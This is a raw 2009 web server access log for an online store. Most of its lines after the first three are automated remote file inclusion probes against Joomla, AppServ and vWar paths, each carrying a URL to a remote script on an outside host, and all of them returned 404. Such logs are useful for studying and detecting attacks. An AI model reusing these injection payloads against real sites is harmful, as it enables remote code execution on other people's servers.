130.13.170.93 - - [16/Jun/2009:02:59:44 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0086D2446CF2B50024AF09D+M37+ENG HTTP/1.1" 200 40496 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086D1406DE21500B24F09D+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:59:46 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0086D24B655245002ABF09D+M37+ENG HTTP/1.1" 200 41744 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086D2446CF2B50024AF09D+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:59:49 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0086D24D61429500244F09D+M37+ENG HTTP/1.1" 200 40579 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086D24B655245002ABF09D+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
211.189.40.249 - - [16/Jun/2009:03:01:09 -0400] "GET /logs/access_log.Q109052200//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://bimonet.zat.su/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [16/Jun/2009:03:01:30 -0400] "GET /logs//[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
83.103.72.130 - - [16/Jun/2009:03:01:31 -0400] "GET //[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
83.103.72.130 - - [16/Jun/2009:03:01:32 -0400] "GET /logs/access_log.Q109051700//[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:03:01:35 -0400] "GET /logs/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:03:01:35 -0400] "GET /main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:03:01:35 -0400] "GET /logs/access_log.Q109051800/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.34.181.87 - - [16/Jun/2009:03:01:46 -0400] "GET /logs/access_log.Q109053000//[site]/[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=[shell]http://impeel.com/impeel/wizard/pit-id.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
64.34.181.87 - - [16/Jun/2009:03:01:46 -0400] "GET /logs/access_log.Q109053000//[site]/[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=[shell]http://impeel.com/impeel/wizard/pit-id.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
